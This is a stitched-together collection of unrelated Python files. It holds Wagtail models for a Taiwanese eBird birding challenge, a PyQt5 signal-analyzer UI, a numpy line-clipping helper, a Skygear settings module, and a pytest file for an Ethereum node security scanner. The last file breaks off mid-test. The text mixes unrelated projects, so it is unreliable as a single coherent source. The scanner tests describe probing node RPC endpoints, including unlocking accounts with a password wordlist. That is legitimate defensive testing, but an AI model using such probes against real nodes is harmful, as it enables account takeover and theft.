    choose_team_page = models.ForeignKey(
        Page,
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name='+',
    )
    prize_page = models.ForeignKey(
        Page,
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name='+',
    )

    content_panels = Page.content_panels + [
        FieldPanel('info_content', classname='full'),
        FieldPanel('choose_team_page'),
        FieldPanel('prize_page'),
    ]
class Reward(Page):
    """Prize-description page for the autumn birding challenge."""
    reward_content = RichTextField(blank=True, help_text='秋季觀鳥競賽的獎品說明')
    content_panels = Page.content_panels + [
        FieldPanel('reward_content', classname='full')
    ]
class TeamIntroduction(Page):
    """Introduces the three competition teams and links to the signup page."""

    team_left_description = models.CharField(blank=True, max_length=100, help_text='彩鷸隊')
    team_middle_description = models.CharField(blank=True, max_length=100, help_text='家燕隊')
    team_right_description = models.CharField(blank=True, max_length=100, help_text='大冠鷲隊')
    signup_page = models.ForeignKey(
        Page,
        null=True,
        blank=True,
        on_delete=models.SET_NULL,
        related_name='+',
    )

    content_panels = Page.content_panels + [
        FieldPanel('team_left_description'),
        FieldPanel('team_middle_description'),
        FieldPanel('team_right_description'),
        FieldPanel('signup_page')
    ]
class Dashboard(MenuPage):
    """Menu page hosting a dashboard driven by a page-specific Brython script."""
    # Internal identifier used to select the dashboard.
    # Fixed help_text typo: "DON'tT" -> "DON'T".
    dash_board_name = models.CharField(max_length=30, blank=False, help_text="DON'T TOUCH this")
    IsDemoApp = models.BooleanField(default=True)
    brython_file_name = models.CharField(max_length=30, blank=True, help_text='page_instance_specific brython script')
    content_panels = Page.content_panels + [
        FieldPanel('IsDemoApp'),
        FieldPanel('dash_board_name', classname='full'),
        FieldPanel('brython_file_name')
    ]
class SignupData(models.Model):
    """One signup record: an eBird account joining one of the three teams."""
    # (value, label) pairs for the three teams; the value is stored in `team`.
    team_choice = [
        ('彩鷸隊', '彩鷸隊' ),
        ('家燕隊', '家燕隊' ),
        ('大冠鷲隊', '大冠鷲隊' ),
    ]
    ebirdid = models.CharField(max_length=50, verbose_name='ebird公開帳號')
    team = models.CharField(max_length=6, choices=team_choice, default='彩鷸隊', verbose_name='隊伍名稱')
    email = models.EmailField(max_length=100, verbose_name='電子信箱')
    signup_time = models.DateTimeField(auto_now_add=True, editable=False, verbose_name='報名時間')
    def __str__(self):
        # A signup is identified by its public eBird id.
        return self.ebirdid
def send_validation_email(email, team, ebirdid):
    """
    Send the signup welcome email (best-effort; failures are printed, not raised).

    :param email: recipient address
    :param team: team name the user signed up for
    :param ebirdid: the user's public eBird id
    """
    t = get_template('fall/welcome_email_complex.html')
    # Pass an explicit context instead of locals() so the template only
    # sees the variables it actually needs.
    content = t.render({'email': email, 'team': team, 'ebirdid': ebirdid})
    msg = EmailMessage(
        '歡迎加入ebirdTaiwan秋季挑戰賽',
        content,
        eb_passwords.mailserver_account,
        [email]
    )
    msg.content_subtype = 'html'
    try:
        msg.send()
    except Exception as e:
        # Best-effort: a failed welcome mail must not abort the signup flow.
        print(e)
class SignupPage(Page):
    """Signup form page; enforces unique eBird id and email per signup."""

    def serve(self, request):
        if request.method == 'POST':
            ebirdid = request.POST.get('ebirdid', None)
            team = request.POST.get('team', None)
            email = request.POST.get('email', None)

            # NOTE(review): locals() is used as the template context below,
            # so the local variable names here are part of the template
            # contract — do not rename them.
            # .exists() avoids fetching whole rows just to count them.
            if SignupData.objects.filter(ebirdid=ebirdid).exists():
                render_data = locals()
                render_data['page'] = self
                render_data['error_message'] = '這個eBird公開顯示名稱已經註冊了!'
                return render(request, 'fall/signup.html', render_data)

            if SignupData.objects.filter(email=email).exists():
                render_data = locals()
                render_data['page'] = self
                render_data['error_message'] = '這個email註冊過了!'
                return render(request, 'fall/signup.html', render_data)

            send_validation_email(email = email, team = team, ebirdid = ebirdid)
            '''
            TODO: add email valid check before add data
            '''
            NewSignupData = SignupData(
                ebirdid=ebirdid,
                team = team,
                email=email,
            )
            NewSignupData.save()

            render_data = locals()
            render_data['page'] = self
            return render(request, 'fall/thankyou.html', render_data)
        else:
            render_data = locals()
            render_data['page'] = self
            return render(request, 'fall/signup.html', render_data)
class AutumnChallengePage(Page):
    """Landing page for the autumn challenge, showing the 20 newest checklists."""
    subtitle = RichTextField(blank=True)
    rules = RichTextField(blank=True)
    prizes = RichTextField(blank=True)
    # Internal identifier used to select the dashboard this page belongs to.
    dash_board_name = models.CharField(max_length=30, blank=False, help_text="DON't TOUCH this")
    content_panels = Page.content_panels + [
        FieldPanel('subtitle'),
        FieldPanel('rules', classname='full'),
        FieldPanel('prizes', classname='full'),
        FieldPanel('dash_board_name')
    ]
    def serve(self, request):
        # Newest 20 scraped checklists; [::-1] flips them oldest-first for display.
        recent_data20 = AutumnChanllengeData.objects.all().order_by('-survey_datetime')[:20]
        df = pd.DataFrame.from_records(recent_data20.values('creator','county','survey_datetime'))[::-1]
        if len(df) > 0:
            peoples = df['creator'].tolist()
            towns = df['county'].tolist()
            upload_time = [datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S') for t in df['survey_datetime'].tolist()]
        else:
            # Empty DataFrame has no columns, so the branch above would KeyError.
            peoples = []
            towns = []
            upload_time = []
        # NOTE(review): locals() is the template context, so the names
        # peoples/towns/upload_time are part of the template contract —
        # do not rename them.
        render_data = locals()
        render_data['page'] = self
        return render(request, 'fall/autumn_challenge_page.html', render_data)
class PredictionData(models.Model):
    """A participant's one-shot guess at the total species/individual counts."""
    participant_name = models.CharField(blank=False, max_length=40, verbose_name='參與者名稱')
    # The phone number acts as the de-duplication key (see SubmitPrediction).
    participant_phone = models.CharField(max_length=30, verbose_name='聯絡電話',default='0912345678')
    guess_n_species = models.IntegerField(default=0, verbose_name='幾種物種?')
    guess_total_individual = models.IntegerField(default=0, verbose_name='全部幾隻?')
    prediction_datetime = models.DateTimeField(auto_now=True, editable=False, verbose_name='何時進行預測')
    def __str__(self):
        # Name plus phone, since the phone number distinguishes entries.
        return self.participant_name + self.participant_phone
class SubmitPrediction(Page):
    """Prediction form page; allows one prediction per phone number."""

    def serve(self, request):
        if request.method == 'POST':
            # NOTE(review): locals() is used as the template context below,
            # so these local names are part of the template contract.
            name = request.POST.get('participant_name', None)
            phone = request.POST.get('participant_phone', None)
            gns = request.POST.get('guess_n_species', None)
            gni = request.POST.get('guess_total_individual', None)

            # .exists() avoids fetching whole rows just to count them.
            if PredictionData.objects.filter(participant_phone=phone).exists():
                render_data = locals()
                render_data['page'] = self
                render_data['error_message'] = '錯誤!一組電話只能進行一次預測'
                return render(request, 'fall/prediction.html', render_data)

            NewPredictionData = PredictionData(
                participant_name = name,
                participant_phone = phone,
                guess_n_species = gns,
                guess_total_individual = gni
            )
            NewPredictionData.save()

            render_data = locals()
            render_data['page'] = self
            return render(request, 'fall/prediction_finish.html', render_data)
        else:
            render_data = locals()
            render_data['page'] = self
            return render(request, 'fall/prediction.html', render_data)
'''
Scraped data area
'''
class Survey(models.Model):
    """One scraped eBird checklist belonging to a team."""
    scrape_date = models.DateField(editable=False,auto_now_add=True,verbose_name='清單抓取日期')
    team = models.CharField(blank=False, max_length=5, default='沒有隊',verbose_name='隊伍名稱')
    checklist_id = models.CharField(blank=False, max_length=15, primary_key=True,verbose_name='清單ID')
    creator = models.CharField(blank=False, max_length=30,verbose_name='清單分享來源')
    survey_datetime = models.DateTimeField(blank=False, verbose_name='調查時間', null=True)  # author's note asked whether verbose_name works here — it does
    latitude = models.FloatField(blank=False, default=23.5,verbose_name='緯度')
    longitude = models.FloatField(blank=False, default=120.5,verbose_name='經度')
    county = models.CharField(default='天國市地獄鎮',max_length=15,verbose_name='鄉鎮名稱')
    is_valid = models.BooleanField(default=False,verbose_name='是否完整') # valid = checklist has no 'X' counts and spans more than 5 minutes
    def __str__(self):
        # Checklists are identified by their eBird checklist id.
        return self.checklist_id
class SurveyObs(models.Model):
    """One species observation (species + count) belonging to a Survey."""
    survey = models.ForeignKey(Survey, on_delete=models.CASCADE, verbose_name='清單ID')
    species_name = models.CharField(blank=False, max_length=30, default='unKnown', verbose_name='物種名稱')
    amount = models.IntegerField(blank=False, default=0, verbose_name='數量')
class AutumnChanllengeData(models.Model):
    """A scraped checklist entry feeding the autumn challenge dashboard."""
    # NOTE(review): the class name misspells "Challenge", but it is referenced
    # by AutumnChallengePage.serve (and presumably migrations), so renaming it
    # would be a breaking change.
    checklist_id = models.CharField(blank=False, max_length=15, primary_key=True,verbose_name='清單ID')
    scrape_date = models.DateField(editable=False,auto_now_add=True,verbose_name='清單抓取日期')
    survey_datetime = models.DateTimeField(editable=False,auto_now_add=False,verbose_name='調查時間')
    creator = models.CharField(editable=False,blank=False, max_length=30,verbose_name='清單分享來源')
    latitude = models.FloatField(default=23.5,verbose_name='緯度')
    longitude = models.FloatField(default=120.5,verbose_name='經度')
    county = models.CharField(default='天國市地獄鎮',max_length=15,verbose_name='鄉鎮名稱')
    is_valid = models.BooleanField(editable=True,verbose_name='有鳥才算數')
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    """
    UI definition for the main window (originally pyuic5-generated).

    The 32 per-channel checkboxes are created and labelled in loops instead
    of 64 copy-pasted statements. Every widget keeps its original attribute
    name (checkBox_1 .. checkBox_32), objectName and geometry, so code that
    references the generated names keeps working.
    """

    # Number of channel checkboxes in the "Channel Selection" group box.
    NUM_CHANNELS = 32

    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(1027, 649)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
        self.tabWidget.setEnabled(True)
        self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1024, 768))
        self.tabWidget.setObjectName("tabWidget")

        # --- "Setup" tab: channel selection ---------------------------------
        self.tab = QtWidgets.QWidget()
        self.tab.setObjectName("tab")
        self.groupBox = QtWidgets.QGroupBox(self.tab)
        self.groupBox.setGeometry(QtCore.QRect(0, 0, 241, 381))
        self.groupBox.setObjectName("groupBox")

        # Checkboxes 1-16 form the left column (x=10), 17-32 the right
        # column (x=130); rows are 20 px apart starting at y=20.
        for i in range(1, self.NUM_CHANNELS + 1):
            column_x = 10 if i <= 16 else 130
            row_y = 20 + 20 * ((i - 1) % 16)
            box = QtWidgets.QCheckBox(self.groupBox)
            box.setGeometry(QtCore.QRect(column_x, row_y, 87, 20))
            box.setObjectName("checkBox_%d" % i)
            setattr(self, "checkBox_%d" % i, box)

        self.btnSelectAll = QtWidgets.QPushButton(self.groupBox)
        self.btnSelectAll.setGeometry(QtCore.QRect(0, 340, 113, 32))
        self.btnSelectAll.setObjectName("btnSelectAll")
        self.btnSelectNone = QtWidgets.QPushButton(self.groupBox)
        self.btnSelectNone.setGeometry(QtCore.QRect(120, 340, 113, 32))
        self.btnSelectNone.setObjectName("btnSelectNone")
        self.tabWidget.addTab(self.tab, "")

        # --- "Plot" tab -----------------------------------------------------
        self.tab_2 = QtWidgets.QWidget()
        self.tab_2.setObjectName("tab_2")
        self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_2.setGeometry(QtCore.QRect(0, 0, 700, 500))
        self.groupBox_2.setObjectName("groupBox_2")
        self.scrollArea = QtWidgets.QScrollArea(self.groupBox_2)
        self.scrollArea.setGeometry(QtCore.QRect(0, 20, 700, 480))
        self.scrollArea.setWidgetResizable(True)
        self.scrollArea.setObjectName("scrollArea")
        self.scrollAreaWidgetContents = QtWidgets.QWidget()
        self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 698, 478))
        self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
        self.scrollArea.setWidget(self.scrollAreaWidgetContents)
        self.btnSetTimeSeriesPlot = QtWidgets.QPushButton(self.groupBox_2)
        self.btnSetTimeSeriesPlot.setGeometry(QtCore.QRect(100, 0, 161, 32))
        self.btnSetTimeSeriesPlot.setObjectName("btnSetTimeSeriesPlot")
        self.groupBox_3 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_3.setGeometry(QtCore.QRect(710, 0, 300, 181))
        self.groupBox_3.setObjectName("groupBox_3")
        self.rbDataFromFile = QtWidgets.QRadioButton(self.groupBox_3)
        self.rbDataFromFile.setGeometry(QtCore.QRect(0, 20, 131, 20))
        self.rbDataFromFile.setObjectName("rbDataFromFile")
        self.rbRealTimeData = QtWidgets.QRadioButton(self.groupBox_3)
        self.rbRealTimeData.setGeometry(QtCore.QRect(160, 20, 121, 20))
        self.rbRealTimeData.setObjectName("rbRealTimeData")
        self.btnLoad = QtWidgets.QPushButton(self.groupBox_3)
        self.btnLoad.setGeometry(QtCore.QRect(0, 40, 90, 32))
        self.btnLoad.setObjectName("btnLoad")
        self.btnConn = QtWidgets.QPushButton(self.groupBox_3)
        self.btnConn.setGeometry(QtCore.QRect(100, 40, 90, 32))
        self.btnConn.setObjectName("btnConn")
        self.btnDisconn = QtWidgets.QPushButton(self.groupBox_3)
        self.btnDisconn.setGeometry(QtCore.QRect(200, 40, 90, 32))
        self.btnDisconn.setObjectName("btnDisconn")
        self.line = QtWidgets.QFrame(self.groupBox_3)
        self.line.setGeometry(QtCore.QRect(0, 70, 301, 16))
        self.line.setFrameShape(QtWidgets.QFrame.HLine)
        self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line.setObjectName("line")
        self.groupBox_4 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_4.setGeometry(QtCore.QRect(0, 500, 700, 100))
        self.groupBox_4.setObjectName("groupBox_4")
        self.groupBox_5 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_5.setGeometry(QtCore.QRect(710, 180, 300, 211))
        self.groupBox_5.setObjectName("groupBox_5")
        self.groupBox_6 = QtWidgets.QGroupBox(self.tab_2)
        self.groupBox_6.setGeometry(QtCore.QRect(710, 390, 301, 211))
        self.groupBox_6.setObjectName("groupBox_6")
        self.comboBox = QtWidgets.QComboBox(self.groupBox_6)
        self.comboBox.setGeometry(QtCore.QRect(143, 0, 161, 26))
        self.comboBox.setObjectName("comboBox")
        self.tabWidget.addTab(self.tab_2, "")

        # --- "Analyze" tab (empty placeholder) ------------------------------
        self.tab_3 = QtWidgets.QWidget()
        self.tab_3.setObjectName("tab_3")
        self.tabWidget.addTab(self.tab_3, "")

        MainWindow.setCentralWidget(self.centralwidget)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.actionimport = QtWidgets.QAction(MainWindow)
        self.actionimport.setObjectName("actionimport")

        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(1)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "ZJU Biomedical Signal Analyzer - V0.1"))
        self.groupBox.setTitle(_translate("MainWindow", "Channel Selection"))
        # Channel checkbox captions: "channel 01" .. "channel 32".
        for i in range(1, self.NUM_CHANNELS + 1):
            getattr(self, "checkBox_%d" % i).setText(
                _translate("MainWindow", "channel %02d" % i))
        self.btnSelectAll.setText(_translate("MainWindow", "Select All"))
        self.btnSelectNone.setText(_translate("MainWindow", "Select None"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Setup"))
        self.groupBox_2.setTitle(_translate("MainWindow", "Time Series Plot"))
        self.btnSetTimeSeriesPlot.setText(_translate("MainWindow", "Refresh Plot Setup"))
        self.groupBox_3.setTitle(_translate("MainWindow", "Plot Setup"))
        self.rbDataFromFile.setText(_translate("MainWindow", "Data From File"))
        self.rbRealTimeData.setText(_translate("MainWindow", "Real Time Data"))
        self.btnLoad.setText(_translate("MainWindow", "Load..."))
        self.btnConn.setText(_translate("MainWindow", "Connect"))
        self.btnDisconn.setText(_translate("MainWindow", "Disconnect"))
        self.groupBox_4.setTitle(_translate("MainWindow", "Extracted Features"))
        self.groupBox_5.setTitle(_translate("MainWindow", "FFT Plot"))
        self.groupBox_6.setTitle(_translate("MainWindow", "Features Plot"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Plot"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate("MainWindow", "Analyze"))
        self.actionimport.setText(_translate("MainWindow", "import"))
|
import numpy as np
def line_segments_from_homogeneous(lines, bbox):
    """
    Clip homogeneous 2D lines to an axis-aligned bounding box.

    :param lines: (N, 3) array of lines in homogeneous form (a, b, c),
        satisfying a*x + b*y + c = 0
    :param bbox: (x, y, w, h) bounding box
    :returns: lists ``X``, ``Y`` of length N; entry i is ``(x0, x1)`` /
        ``(y0, y1)`` for the clipped segment of line i, or ``None`` in both
        lists if the line does not meet the box in exactly two edge points
    """
    x, y, w, h = bbox

    # Box corners in homogeneous coordinates.
    A = np.array([x, y, 1])
    B = np.array([x + w, y, 1])
    C = np.array([x + w, y + h, 1])
    D = np.array([x, y + h, 1])

    # Each edge is the cross product of its two corner points.
    edges = [np.cross(a, b) for a, b in [[A, B], [B, C], [C, D], [D, A]]]

    # Intersection of every line with every edge (still homogeneous).
    intersections = [np.cross(lines, e) for e in edges]

    # Dehomogenize. A line parallel to an edge meets it "at infinity"
    # (last coordinate 0); suppress the divide warnings deliberately and
    # let the resulting inf/nan fail the in-box test below.
    with np.errstate(divide='ignore', invalid='ignore'):
        normalized = [p[:, :2] / p[:, -1].reshape(-1, 1)
                      for p in intersections]

    X = []
    Y = []
    for p in zip(*normalized):
        # Keep only intersection points that actually lie on the box.
        P = [(u, v) for (u, v) in p
             if (x <= u <= x + w) and (y <= v <= y + h)]
        if len(P) == 2:
            (x0, y0), (x1, y1) = P
            X.append((x0, x1))
            Y.append((y0, y1))
        else:
            X.append(None)
            Y.append(None)
    return X, Y
# Copyright 2015 Oursky Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
from argparse import Namespace
from .parser import SettingsParser
from .module import _config_module, get_module
# Registry of named SettingsParser instances, keyed by namespace name.
_parsers = {}

"""
`settings` is namespaced settings for plugins. Following is an example of how
a plugin developer can register settings and query back the value.
Declaring the required settings:
```
from skygear.settings import SettingsParser, add_parser
parser = SettingsParser('SKYGEAR_CMS')
parser.add_setting('prefix', default='cms')
parser.add_setting('static_assets_prefix', default='/static/:prefix/')
add_parser('cms', parser)
```
The settings module will read the environment and set the value. For example,
os.environ `SKYGEAR_CMS_PREFIX` will be available as follows:
```
from skygear.settings import settings
settings.cms.prefix
```
"""

settings = Namespace()


def add_parser(name, parser, parse_now=True):
    """
    Add the specified SettingsParser. If parse_now is True (the default),
    the parser is run immediately.

    :raises Exception: if a parser is already registered under `name`
    """
    global _parsers
    if name in _parsers:
        # Bug fix: the message placeholder was never formatted; `name` was
        # being passed as a stray second argument to Exception().
        raise Exception('Parser "{}" already defined.'.format(name))
    _parsers[name] = parser
    if parse_now:
        _parse(name, parser)


def _parse(name, parser):
    """Run one parser and attach its Namespace to `settings` under `name`."""
    global settings
    ns = getattr(settings, name, Namespace())
    ns = parser.parse_settings(ns)
    setattr(settings, name, ns)


def parse_all():
    """
    Parse all settings.
    """
    global _parsers
    global settings
    for name, parser in _parsers.items():
        _parse(name, parser)
    return settings
def config_module(name, *args, **kwargs):
    """
    Configure a skygear module by name, importing it if necessary.

    If the module was already loaded at boot time (registered with the
    plugin runner), that same module object is reused — config_module will
    not import another copy. Otherwise the name is imported as a normal
    package. Configuration happens through the module's `includeme`
    function, in which all skygear lambda functions, database hooks, etc.
    are expected to be declared, for example:

    ```
    import skygear
    def includeme(settings, *args, **kwargs):
        @skygear.op('some:lambda')
        def some_lambda_func():
            return {
                'success': True,
                'message': 'Some message being returned'
            }
        @skygear.after_save('some_record', async_=True)
        def some_record_after_save(record, original_record, db):
            return {
                'success': True
            }
        # other lambda functions
    ```

    `includeme` is called when:

    1. the module is declared on the Skygear Plugin Runner, i.e.
       `py-skygear some_module`, or
    2. the module is configured in cloud code, i.e. the user calls
       `skygear.config('some_module')`.

    The global `settings` namespace is passed to `includeme` as an argument.
    """
    global settings
    try:
        module = get_module(name)
    except NameError:
        # Not registered at boot time; import it as a regular package.
        module = importlib.import_module(name)
    _config_module(module, settings, *args, **kwargs)
# Bug fix: __all__ must contain name strings, not the objects themselves;
# with objects in the list, `from skygear.settings import *` raises a
# TypeError ("Item in __all__ must be str").
__all__ = [
    'Namespace',
    'SettingsParser', 'settings',
    'config_module',
    'add_parser', 'parse_all',
]
|
import uuid
from unittest.mock import Mock, patch
import pytest
import requests_mock
from teatime import Context, Issue, NodeType, Report, Severity
from teatime.plugins.eth1 import (
AccountCreation,
AccountUnlock,
GethAccountImport,
GethDatadir,
GethNodeInfo,
GethStartRPC,
GethStartWebsocket,
GethStopRPC,
GethStopWebsocket,
GethTxPoolInspection,
GethTxPoolStatus,
HashrateStatus,
MiningStatus,
NetworkListening,
NodeSync,
NodeVersion,
OpenAccounts,
ParityChangeCoinbase,
ParityChangeExtra,
ParityChangeTarget,
ParityDevLogs,
ParityDropPeers,
ParityGasCeiling,
ParityGasFloor,
ParityMinGasPrice,
ParitySyncMode,
ParityTxCeiling,
ParityTxPoolStatistics,
ParityUpgrade,
PeerCountStatus,
PeerlistLeak,
PeerlistManipulation,
SHA3Consistency,
TxPoolContent,
)
# Host:port of the simulated JSON-RPC node the plugins are pointed at.
TARGET = "127.0.0.1:8545"
# Fixed UUID injected into every Issue so expected and actual issues compare equal.
TEST_UUID = "e7a657e4-0691-477c-b840-5fce5930fb21"
# Accumulated pytest.param entries; each is
# (plugin, node_type, mocked_rpc_responses, expected_rpc_methods, expected_issues).
TESTCASES = []
# AccountCreation: a personal_newAccount success (on either client) must log a
# MEDIUM issue; a JSON-RPC error response must log nothing.
TESTCASES += [
    pytest.param(
        AccountCreation(test_password="pa$$w0rd"),
        NodeType.PARITY,
        (
            {
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0xlolthisistotallyvalid",
                },
            },
        ),
        ["personal_newAccount"],
        [
            Issue(
                uuid=TEST_UUID,
                title="We managed to create a new account on your node",
                description=(
                    "A new account can be generated on the node "
                    "itself using the personal_newAccount RPC call."
                ),
                severity=Severity.MEDIUM,
                raw_data="0xlolthisistotallyvalid",
            )
        ],
        id="AccountCreation parity issue logged",
    ),
    pytest.param(
        AccountCreation(test_password="pa$$w0rd"),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0xlolthisistotallyvalid",
                },
            },
        ),
        ["personal_newAccount"],
        [
            Issue(
                uuid=TEST_UUID,
                title="We managed to create a new account on your node",
                description=(
                    "A new account can be generated on the node "
                    "itself using the personal_newAccount RPC call."
                ),
                severity=Severity.MEDIUM,
                raw_data="0xlolthisistotallyvalid",
            )
        ],
        id="AccountCreation geth issue logged",
    ),
    # Error responses: the plugin must stay silent.
    pytest.param(
        AccountCreation(test_password="pa$$w0rd"),
        NodeType.GETH,
        ({"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},),
        ["personal_newAccount"],
        [],
        id="AccountCreation geth error present",
    ),
    pytest.param(
        AccountCreation(test_password="pa$$w0rd"),
        NodeType.PARITY,
        ({"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},),
        ["personal_newAccount"],
        [],
        id="AccountCreation parity error present",
    ),
]
# GethDatadir: geth-only check. A successful admin_datadir call leaks the data
# directory (LOW issue); an RPC error logs nothing; parity nodes are skipped
# entirely (no RPC calls expected).
TESTCASES += [
    pytest.param(
        GethDatadir(),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "error": {"message": "Method not found"},
                },
            },
        ),
        ["admin_datadir"],
        [],
        id="GethDatadir geth unknown method",
    ),
    pytest.param(
        GethDatadir(),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "/home/ethismoney/.ethereum",
                },
            },
        ),
        ["admin_datadir"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Admin datadir access",
                description=(
                    "The datadir directory path can be "
                    "fetched using the admin_datadir RPC call."
                ),
                severity=Severity.LOW,
                raw_data="/home/ethismoney/.ethereum",
            )
        ],
        id="GethDatadir geth issue logged",
    ),
    pytest.param(
        GethDatadir(),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethDatadir parity skipped",
    ),
]
# GethAccountImport: geth-only. A successful personal_importRawKey logs a
# MEDIUM issue; parity is skipped; an RPC error logs nothing.
TESTCASES += [
    pytest.param(
        GethAccountImport(keydata="0x0", password="pa$$w0rd"),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "id": 1,
                    "jsonrpc": "2.0",
                    "result": "0xlolthisistotallyvalid",
                },
            },
        ),
        ["personal_importRawKey"],
        [
            Issue(
                uuid=TEST_UUID,
                title="We managed to import an account on your node",
                description=(
                    "A private key can be imported on the node to initialize an "
                    "account using the personal_importRawKey RPC call."
                ),
                severity=Severity.MEDIUM,
                raw_data="0xlolthisistotallyvalid",
            )
        ],
        id="GethAccountImport geth issue logged",
    ),
    pytest.param(
        GethAccountImport(keydata="0x0", password="pa$$w0rd"),
        NodeType.PARITY,
        [],
        [],
        [],
        id="GethAccountImport parity skipped",
    ),
    pytest.param(
        GethAccountImport(keydata="0x0", password="pa$$w0rd"),
        NodeType.GETH,
        ({"status_code": 200, "json": {"id": 1, "jsonrpc": "2.0", "error": {}}},),
        ["personal_importRawKey"],
        [],
        id="GethAccountImport geth error present",
    ),
]
# AccountUnlock: the plugin chains three calls -- eth_accounts (list accounts),
# eth_getBalance (skip accounts below `skip_below`), personal_unlockAccount
# (try each wordlist password). A successful unlock logs a CRITICAL issue;
# empty account lists, low balances, and unlock errors log nothing.
# Cases are mirrored for geth and parity.
TESTCASES += [
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
            {
                "status_code": 200,
                "json": {"jsonrpc": "2.0", "id": 1, "result": True},
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Weak password detected!",
                description=(
                    "The account (0x06012c8cf97bead5deae237070f9587f8e7a266d) "
                    "is only protected by a weak password (test-password)"
                ),
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="AccountUnlock geth issue logged",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.PARITY,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
            {
                "status_code": 200,
                "json": {"jsonrpc": "2.0", "id": 1, "result": True},
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [
            Issue(
                uuid=TEST_UUID,
                title="Weak password detected!",
                description=(
                    "The account (0x06012c8cf97bead5deae237070f9587f8e7a266d) "
                    "is only protected by a weak password (test-password)"
                ),
                severity=Severity.CRITICAL,
                raw_data=True,
            )
        ],
        id="AccountUnlock parity issue logged",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": [],
                },
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock geth no accounts",
    ),
    # TODO: Enable when better infura check in place
    # pytest.param(
    #     AccountUnlock(infura_url="https://infura", wordlist=["test-password"], skip_below=100),
    #     NodeType.GETH,
    #     ({"status_code": 200, "json": {
    #         "jsonrpc": "2.0",
    #         "id": 1,
    #         "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
    #     }},{"status_code": 200, "json": {}},),
    #     ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
    #     [],
    #     id="AccountUnlock geth infura balance error",
    # ),
    pytest.param(
        AccountUnlock(
            infura_url="https://infura", wordlist=["test-password"], skip_below=100
        ),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
                    "result": ["0x06012c8cf97bead5deae237070f9587f8e7a266d"],
                },
            },
            {
                "status_code": 200,
                "json": {"id": 1, "jsonrpc": "2.0", "result": "0x1"},
            },
        ),
        ["eth_accounts", "eth_getBalance", "personal_unlockAccount"],
        [],
        id="AccountUnlock geth too little balance",
    ),
    pytest.param(
        AccountUnlock(infura_url="https://infura", wordlist=["test-password"]),
        NodeType.GETH,
        (
            {
                "status_code": 200,
                "json": {
                    "jsonrpc": "2.0",
                    "id": 1,
